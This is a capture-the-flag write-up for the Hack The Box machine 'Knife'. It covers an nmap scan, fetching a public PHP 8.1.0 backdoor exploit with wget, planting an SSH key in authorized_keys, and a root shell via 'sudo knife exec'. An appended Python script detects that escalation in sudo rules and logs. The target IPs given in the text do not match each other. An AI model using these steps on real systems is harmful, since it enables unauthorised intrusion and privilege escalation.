HTB: Knife

Machine IP: 10.129.139.25
System IP: 10.10.16.12
One of the easiest boxes for a beginner. Just don’t overthink it: look for vulnerabilities in the things you see on the surface.
Let’s start with network mapper (Nmap)
nmap -A -T4 -p- -v 10.129.139.27 -oN ./nmap.txt
which outputs the following
Nmap scan report for 10.129.139.27
Host is up (0.26s latency).
Not shown: 65431 closed ports, 102 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80
On inspection I found that it’s running on `php 8.1.0`, and with a simple Google search I landed on an exploit-db link.
After copying the Python code to our system
wget https://www.exploit-db.com/raw/49933
and running the exploit with the target’s IP, boom, we are inside the system :)

Inside `/home/james/user.txt` we got the user flag.
Let’s check `sudo -l`:
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
But our shell isn’t stable at all, so :’) we are not able to navigate properly.
So let’s log in via SSH instead. As we can’t use wget, we need to echo our public key into authorized_keys. Note: you have to generate the key pair first.
echo "ssh-rsa AAA......." > ~/.ssh/authorized_keys
and then ssh from our machine
ssh -i id_rsa james@10.10.10.242
On executing
sudo /usr/bin/knife
we find this

So basically we can make knife run a script as root :) which is exactly what we want: just execute a shell as root.
Now let’s run it to get the root shell
sudo knife exec --exec "exec '/bin/sh -i' "

What we are doing here is using `knife exec`, which evaluates Ruby code, to run `/bin/sh -i`
as root, since we can execute knife with sudo without a password.
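As an added defender-side example (not part of the original writeup), the following Python audits the `sudo -l` output shown above for passwordless root rules on binaries that can spawn a shell, such as knife, and flags `sudo knife exec` invocations in sample auth.log lines. The log lines and the `SHELL_CAPABLE` table are assumptions constructed for this example.

```python
import re

# Constructed sample: the `sudo -l` output from the writeup, as a defender
# would collect it from each host during a sudoers review.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""

# Assumed table of binaries whose sudo-allowed use yields a root shell
# through a built-in "run arbitrary code" feature.
SHELL_CAPABLE = {"/usr/bin/knife": "knife exec evaluates arbitrary Ruby as root"}

# Matches a sudoers rule line such as "(root) NOPASSWD: /usr/bin/knife".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S.*)$")

def parse_sudo_rules(text):
    """Return (runas_user, nopasswd, command) tuples from `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()
        nopasswd = "NOPASSWD" in m.group("tags").upper()
        for cmd in m.group("cmd").split(","):
            rules.append((runas, nopasswd, cmd.strip()))
    return rules

def find_risky_rules(text):
    """Flag rules that grant root, via a shell-capable binary, to the user."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_rules(text):
        binary = cmd.split()[0]
        if runas in ("root", "ALL") and binary in SHELL_CAPABLE:
            findings.append((binary, nopasswd, SHELL_CAPABLE[binary]))
    return findings

# Constructed sample auth.log lines in the format sudo writes on Ubuntu.
AUTH_LOG = """\
May  5 10:01:02 knife sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=root ; COMMAND=/usr/bin/knife node list
May  5 10:02:17 knife sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=root ; COMMAND=/usr/bin/knife exec --exec exec '/bin/sh -i'
"""

LOG_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")

def detect_knife_exec(log_text):
    """Return (user, command) for sudo runs of `knife exec` as root; plain knife use is ignored."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m and m.group("target") == "root" and re.search(r"/knife\s+exec\b", m.group("cmd")):
            hits.append((m.group("user"), m.group("cmd").strip()))
    return hits
```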
Thanks for reading and stay tuned for similar writeups.